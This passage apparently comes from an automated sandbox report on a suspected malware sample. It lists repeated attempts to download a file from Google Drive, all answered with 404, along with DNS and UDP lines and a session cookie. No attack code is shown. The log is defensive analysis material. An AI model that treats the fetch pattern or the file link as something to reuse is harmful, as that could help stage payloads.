      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7_J-d-kUnNcZJuem94ZrY18AGb6irGmIf4YdlPYqVfSJ5y96NFG_QqOar-QJlWxvzAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:57:38 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-RjjFy2oloISL-BILCeSdbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz; expires=Tue, 17-Jun-2025 16:57:38 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; 